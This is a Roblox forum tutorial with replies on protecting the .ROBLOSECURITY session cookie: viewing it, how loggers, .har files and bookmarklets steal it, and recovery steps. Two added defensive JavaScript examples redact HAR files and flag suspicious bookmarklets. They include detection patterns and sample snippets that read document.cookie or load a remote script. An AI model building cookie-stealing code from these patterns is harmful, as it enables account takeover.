About the .ROBLOSECURITY cookie

Today, we will learn about the .ROBLOSECURITY cookie: what it is, how you can reset it and more!

Before we start, what exactly is a cookie?
A cookie is a small piece of data or file. Your browser stores these cookies. These cookies are used to improve user experience or remember user information. For example, some cookies keep the user logged in and save all kinds of stuff like preferences and what you have saved in a shopping cart, and remember user data such as passwords. This is a good thing. These cookies are known as HTTP cookies. However, not all cookies are good. Third-party cookies track you across the web.

What is the .ROBLOSECURITY cookie?
The .ROBLOSECURITY cookie is a browser cookie used by Roblox. This cookie stores the user session. This cookie is also used to see the user who is logged in. You should keep this safe.

Cookie security

It is not all fun and games. This .ROBLOSECURITY cookie can be hacked. When a hacker gets your cookie, they can sign in to your account with no verification, not even 2-step verification (2SV). There are several ways this cookie can get hacked.

Cookie loggers

These loggers can be extensions or software. They have malicious code to get your cookie and hack you. The loggers then silently send your cookie to the attacker or a server run by the attacker. Sometimes these sneaky loggers are able to avoid being detected by anti-virus software. These are coded in JavaScript and other popular languages.

Social engineering

Social engineering is when someone tries to trick you into revealing your cookie. This involves exploiting human psychology. There are many forms of social engineering like phishing, vishing, baiting, impersonating. When someone is trying to build up your trust to reveal the cookie, it is a form of social engineering. Do not trust anyone. Be suspicious of everyone. This happens all the time, with small to big people, this is everywhere.

JavaScript

This programming language is notorious for malware and viruses. It is also great for interactive websites. But, this powered language is also used to steal cookies. With malicious JavaScript code, extensions, software, bookmarks and more can be used to steal your .ROBLOSECURITY cookie.

.har File

Has someone told you to send them a .har file? That is dangerous and can steal your cookie. You should not send them anything about this cookie or the file.

How can I see my cookie?

Before starting, please keep in mind that these extensions may steal your cookies, and I recommend doing it the Developer Tools way. This one is for simplicity.

  1. Install a cookie extension (I use EditMyCookie).

  2. Go to Roblox.

  3. Open your cookie extension

  4. View the .ROBLOSECURITY cookie

  5. See it, it starts with |WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.| and also has random digits.

Never share this!

Developer tools way

This way requires no extension and is recommended.
Thanks to this post for telling me this is possible:

Bing/Edge:

  1. Go to Developer Tools, simply click the three dots or Alt+F, then click More tools then Developer tools, should look like this: (The code can be different, should look similar)

  2. Click the right-side arrows, they look like this:

  3. You should see options like Security, CSS Overview and more.

  4. Click Application

  5. You should see some site stuff, click Cookies (the arrow)

  6. You will see down a cookie called https://www.roblox.com

  7. Click https://www.roblox.com, your screen should look like this:

  8. Click the .ROBLOSECURITY cookie (You can look at the names list and find it)

  9. Congratulations for finding your cookie! Your screen should look like this: (Do not screen-record this or send this)

Almost uploaded the uncensored version of the cookie! :cookie:

Google:

Google has the same steps and UI as Bing.

Other browsers probably have the same steps.

We have learned what cookies are, what .ROBLOSECURITY is and some ways that they can be stolen. Here is how to secure your cookie:

I think my cookie is stolen, what do I do?

You must click the Sign out of other sessions button in your settings to reset your cookie and make your old one stop working.

I think I have a hidden cookie logger, what do I do?

If you are suspicious about a cookie logger, you can research the suspected extension or file.

It is best to run a security scan using a trusted anti-virus or VirusTotal.

I am downloading something, it may be a cookie logger. What do I do?

Not everything you download is a cookie logger or virus.

Before installing, you must research what you are downloading for authenticity, security and see the reviews.

Make sure that you are downloading the program from the actual or trusted site. Some sites can disguise the app with an unwanted virus or cookie logger.

Make sure that the app you will install is the newest version, older versions may be buggier.

Installed? See if your device is weird after installing. Is it slow and taking up most resources? Possible crypto miner. Is your device getting bombarded with advertisements? Spyware. Is your device acting strange? Virus. When those happen, remove what you have downloaded.

This should apply when you are downloading extensions and software.

My account was hacked because of a cookie logger. What do I do?

You can try signing in with your verification or backup codes.

Did that happen when you installed an extension or file? Most likely, it is the cause. Remove it. You should also run a security scan to check the bad things that steal your data.

If that did not work, contact Roblox Support to give you back your account and they can give you stolen robux and items too. They can only do 1 rollback. You should prove to them you are the owner. You can try sending images and more proof.

If you got or did not get your account back, at least you learned the danger of cookies and how to avoid it next time.

Thank you for reading! Now you know cookies, how they get hacked and how to prevent hacking!

Updatelog
Update 1: Release
Update 2: Seeing your cookie added
Update 3: I found out this was useless. It provides no value for developers, but I will keep it for some people.
Update 4: Updated the seeing cookie method to be secure, since extensions can steal stuff, it is recommended to use the Developer Tools way.

11 Likes

You don’t need a cookie extension to view the cookie, you can press F12, then application then go through the cookies until you find .ROBLOSECURITY

Other than that, great job, now I can secure my account more!

4 Likes

No problem, glad this helped! I will try doing F12.

1 Like

Update: Nothing happens, I am on Bing (do not bomb my house), I will try going to Developer Tools.

Update 2: I found how to do it on Bing, I will update it.

1 Like

How in the world can bookmarks steal cookies?

by resetting your password*

1 Like

Basically adding a website to your bookmark is the exact same thing as typing a website name in the address bar except you didn’t type it in and you just have to click on the icon. Address bars can also execute JavaScript code so as a result bookmarks have the ability to execute JavaScript code that can steal your cookies. This JavaScript code is usually obfuscated so it will be pretty hard to tell what the code is exactly doing which should be an immediate red flag.

If you want more information on this subject you should watch this video:

@IWasTaked0 I think you should mention to not give anyone a .har file on Roblox as those can also give access to your .ROBLOSECURITY cookie

1 Like

This mentions the .har file risks and danger and I clearly mentioned it steals your cookies.

2 Likes
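An added example for the .har warnings in this thread (not code from any of the posters or from Roblox): a .har file is a JSON export of your browser's network traffic, so it carries the Cookie headers your browser sent. This sketch wipes cookies, auth headers and bodies from a parsed HAR and reports what it found; `redactHar`, `cookieNames`, the `/home` path and the `theme` cookie are made up for the illustration.

```javascript
const SENSITIVE_HEADERS = new Set(["cookie", "set-cookie", "authorization"]);
const REDACTED = "[REDACTED]";

// Cookie names carried by a Cookie or Set-Cookie header value.
function cookieNames(headerName, value) {
  const kind = headerName.toLowerCase();
  if (kind !== "cookie" && kind !== "set-cookie") return [];
  const names = String(value).split(";").map(p => p.trim().split("=")[0]).filter(Boolean);
  // In Set-Cookie only the first pair is the cookie; the rest are attributes.
  return kind === "set-cookie" ? names.slice(0, 1) : names;
}

// Returns a sanitized deep copy plus a record of what was wiped and where.
function redactHar(har) {
  const copy = JSON.parse(JSON.stringify(har)); // leave the caller's object untouched
  const findings = [];
  (copy.log?.entries ?? []).forEach((entry, i) => {
    for (const side of ["request", "response"]) {
      const msg = entry[side];
      if (!msg) continue;
      for (const h of msg.headers ?? []) {
        if (!SENSITIVE_HEADERS.has(String(h.name).toLowerCase())) continue;
        findings.push({ entry: i, side, where: h.name, names: cookieNames(h.name, h.value) });
        h.value = REDACTED;
      }
      // The export also holds a parsed copy of every cookie; wipe that too.
      for (const c of msg.cookies ?? []) {
        findings.push({ entry: i, side, where: "cookies[]", names: [c.name] });
        c.value = REDACTED;
      }
      // Bodies can hold passwords or tokens (login forms, JSON replies).
      const body = side === "request" ? msg.postData : msg.content;
      if (body?.text) body.text = REDACTED;
    }
  });
  return { har: copy, findings };
}

// Constructed sample for this added example (not a real capture); values are placeholders.
const SAMPLE_HAR = { log: { version: "1.2", entries: [{
  request: { method: "GET", url: "https://www.roblox.com/home",
    headers: [{ name: "Cookie", value: ".ROBLOSECURITY=PLACEHOLDER-VALUE; theme=dark" },
              { name: "Accept", value: "text/html" }],
    cookies: [{ name: ".ROBLOSECURITY", value: "PLACEHOLDER-VALUE" }, { name: "theme", value: "dark" }] },
  response: { status: 200, content: { text: "<html></html>" },
    headers: [{ name: "Set-Cookie", value: "theme=dark; Path=/" }],
    cookies: [{ name: "theme", value: "dark" }] },
}] } };

console.log(redactHar(SAMPLE_HAR).findings);
```

If the findings list names .ROBLOSECURITY, the unredacted file would have let whoever received it reuse your session.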

Activate windows… PLEASE!!!

Anyway, cookie method 3: console.

Using the console, any errors, prints, or warnings will show, as well as the result of any typed code. This includes variable names. You can run “document.cookie” to see all your cookies, including the .ROBLOSECURITY! If you’re executing unknown code, look out for this variable, and things like fetch, XMLHttpRequest, etc. Large bookmarklets commonly use external scripts (.js files), so open those in a new tab to view them. Please note that code involving making requests to a site usually needs your cookies on that site. Roblox request = roblox cookie! Discord webhook != roblox cookie!
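An added example of the checks described in the two posts above about bookmarks and the console (not code from either poster): it reads a bookmarklet or pasted snippet as text, undoes the URL encoding bookmarks use, and looks for cookie access, network calls, external script loading and obfuscation without ever running the code. The function names, flag names and sample snippets are made up for the illustration.

```javascript
// Added example: static triage only, the snippet is never executed.
const CHECKS = [
  { flag: "reads-cookies",   re: /document\s*\.\s*cookie|document\s*\[\s*['"`]cookie/ },
  { flag: "network-request", re: /\bfetch\s*\(|XMLHttpRequest|sendBeacon/ },
  { flag: "external-script", re: /createElement\s*\(\s*['"`]script|import\s*\(|\.js\b['"`]/ },
  { flag: "obfuscation",     re: /\beval\s*\(|\batob\s*\(|fromCharCode|new\s+Function|(?:\\x[0-9a-f]{2}){8,}/i },
];

// Bookmarklets are URLs: drop the scheme and undo percent-encoding,
// a few times over because encoding is sometimes applied more than once.
function decodeBookmarklet(text) {
  let code = text.trim().replace(/^javascript:/i, "");
  for (let i = 0; i < 3; i++) {
    let next;
    try { next = decodeURIComponent(code); } catch { break; } // stray % signs
    if (next === code) break;
    code = next;
  }
  return code;
}

function inspectSnippet(text) {
  const code = decodeBookmarklet(text);
  const flags = CHECKS.filter(c => c.re.test(code)).map(c => c.flag);
  const urls = [...new Set(code.match(/https?:\/\/[^\s'"`)\\]+/g) ?? [])];
  const has = f => flags.includes(f);
  // Obfuscation hides intent; cookies plus a request means data can leave the page.
  const risky = has("obfuscation") ||
    (has("reads-cookies") && (has("network-request") || has("external-script")));
  const verdict = risky ? "do-not-run" : flags.length ? "review" : "no-known-patterns";
  return { flags, urls, verdict };
}

// Constructed samples; example.invalid does not resolve, and "encoded" is an
// incomplete fragment that only exercises the checks.
const SAMPLES = {
  encoded: "javascript:var%20c%3Ddocument.cookie%3Bvar%20x%3Dnew%20XMLHttpRequest()%3B",
  loader: "javascript:(function(){var s=document.createElement('script');s.src='https://example.invalid/tool.js';document.body.appendChild(s)})()",
  plain: "javascript:void(document.title='hello')",
};

for (const [name, text] of Object.entries(SAMPLES)) console.log(name, inspectSnippet(text));
```

A "no-known-patterns" verdict only means none of these patterns matched; the URLs listed for a "review" verdict are the external scripts to open and read before running anything.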

Sorry to bump but is rblx.social a cookie logger or something?

Again sorry for the dumb question, but I wanna know if it’s a roblox redirect or not

It redirects me to roblox but it’s impossible for another website to steal your cookie like that

I saw a reddit post similar to the link that I’m talking about.

It’s a phishing website, it mimics Roblox’s website and gets u to log in normally and it sends your info to their Discord webhook. There’s no logging of your IP or any cookies by just visiting the site. I have seen much source code of these websites.

Ohh, I read it wrong cause I thought the link was like a cookie grabber type or something cause these scams getting more advanced by the days.

They’re not getting advanced in terms of grabbing ur data, they’re getting advanced in terms of tricking u to give them the data, their technical side is not advanced

Yeah, but the part which got my eye was this:

It’s a cookie grabber, ROBLOSECURITY has your details logged as a cookie if you click on that link it could take your ROBLOSECURITY cookie and replace his own one with yours.

And I was wondering if that was even possible.

It’s just not possible, it would be a major security breach for roblox and the company itself would be in shambles

1 Like